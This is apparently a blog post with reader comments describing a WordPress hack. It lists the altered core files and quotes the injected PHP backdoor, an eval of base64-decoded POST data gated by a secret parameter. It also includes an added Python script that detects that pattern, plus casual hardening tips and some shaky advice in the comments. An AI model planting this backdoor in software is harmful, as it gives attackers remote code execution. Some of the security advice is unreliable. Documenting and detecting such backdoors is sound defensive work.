Last January, WordPress.net.in injected code into my WordPress files. The following WordPress files were injected with numbers for SQL:
- wp-admin/admin.php
- wp-admin/index.php
- wp-includes/wp-db.php
- wp-includes/pluggable.php
- wp-includes/gettext.php
- wp-includes/default-filters.php
Then it happened again. My site has been hacked, but this time it is not completely hacked, since I was able to check some WordPress files that had been altered. It can easily be noticed if you are using Windows Live Writer: you suddenly encounter “blog server error-server error-32700 occurred parse error, not well formed”.
I saw a string like the following:
<?php if($_GET['aee8d2759ea2c769']=="e7d557fe37ae8fd6"){ eval(base64_decode($_POST['file'])); exit; } ?>
This string should not be present in any of the WordPress files mentioned above and needs to be deleted. The easiest way to fix this is to replace the above-mentioned files with the original WordPress installation files, which can be downloaded from their site. It is good that I have a local copy of those files on my computer, because the hack might happen again.
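A check for the cleanup described above, as an added example that is not part of the original post: it flags any of the listed core files that contains an eval(base64_decode($_...)) line and, failing that, any file whose hash differs from a clean local copy of WordPress. The function name `audit`, the status labels and the two directory arguments are assumptions made for this example.

```python
import hashlib
import re
import sys
from pathlib import Path

# Core files the post lists as altered.
CORE_FILES = [
    "wp-admin/admin.php", "wp-admin/index.php", "wp-includes/wp-db.php",
    "wp-includes/pluggable.php", "wp-includes/gettext.php",
    "wp-includes/default-filters.php",
]

# eval() fed by base64_decode() of request data: the shape of the injected line.
BACKDOOR_RE = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)\s*\[", re.I)


def sha256(path):
    return hashlib.sha256(path.read_bytes()).hexdigest()


def audit(site_root, clean_root, files=CORE_FILES):
    """Return {relative_path: status}; names and labels are this example's own.

    'backdoor' = pattern found, 'modified' = differs from the clean copy,
    'missing' = absent on the site, 'no-reference' = no clean copy, else 'ok'.
    """
    report = {}
    for rel in files:
        live, ref = Path(site_root) / rel, Path(clean_root) / rel
        if not live.is_file():
            report[rel] = "missing"
        elif BACKDOOR_RE.search(live.read_text(encoding="utf-8", errors="replace")):
            report[rel] = "backdoor"
        elif not ref.is_file():
            report[rel] = "no-reference"
        elif sha256(live) != sha256(ref):
            report[rel] = "modified"
        else:
            report[rel] = "ok"
    return report


if __name__ == "__main__":
    if len(sys.argv) != 3:
        sys.exit("usage: audit.py <site_root> <clean_wordpress_root>")
    for rel, status in audit(sys.argv[1], sys.argv[2]).items():
        print(f"{status:12} {rel}")
```

The clean copy must be the same WordPress version as the live site, otherwise every file reports as modified.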
Again, I thank gordon.dewis.ca for his post regarding this matter. Further reading turned up good information from another site.
My main index.php was not yet hacked. I believe the hacking was not yet completed. The next time you see an error from Windows Live Writer, check your WordPress installation files.
I have made a to-do checklist.
- I need to set up an .htaccess password. Maybe somebody would like to make a post on doing so 🙂 or I will just have to search via Google.
- Research more possible security fixes for my blog.
- Need to update my plug-ins 🙂
It is good that I am using Windows Live Writer. So the next time your authoring tool has a problem, try searching Google immediately for the problem that it reports. BTW, I need to study this article on the WordPress Codex.
The only way to avoid getting hacked is to start cleaning your computer’s system, because it might be infected with a key-logger virus. This is a type of virus that can record everything that you type on your keyboard and automatically send it to the hacker. There are other types of virus that can cause you to be hacked, so you had better have the best anti-virus installed on your computer and keep it actively running in the background.
@Fibonacci,
I agree with this one and this one. And I am happy to say that after transferring to DreamHost I have not experienced any hack.
@ V_RocKs
Any success in preventing this hack?
Dexter’s last blog post..LG has introduced Advanced IPS (In-Panel-Switching) the kneading board
This is crap!
I have both 2.3.3 and 2.0.11 blogs and they are all getting hacked in this manner.
This has been going on since October 2007, and there have been various new releases since then without this problem being addressed and no input from the authors of WordPress!
That is just bad news all around…
@Dexter: Check out the Codex (http://codex.wordpress.org/Hardening_WordPress). 🙂
Gordon’s last blog post..Leaping eagle ray kills boater
@ snoob
Any instructions on how to do it?
Dexter’s last blog post..LG has introduced Advanced IPS (In-Panel-Switching) the kneading board
No problemo!
KarloPinoyBlogero’s last blog post..A Pinoy Term for the Word ‘Blog’?
Remember to chmod the files that you need protected.
snoob’s last blog post..?I really want to earn money online, what should I do??
Thanks for the advice Karlo.. From now on I will not disclose the plug-ins that I am using.. 🙂
Dexter’s last blog post..LG has introduced Advanced IPS (In-Panel-Switching) the kneading board
You know what, I think the reason why your blog is hacked often is because you disclose the plugins that you use on your blog. WordPress plugins are the ones that make a blog vulnerable to attacks.
I’m guessing that hackers just searched for a WordPress plugin that has some security issues and landed on your blog.
KarloPinoyBlogero’s last blog post..A Pinoy Term for the Word ‘Blog’?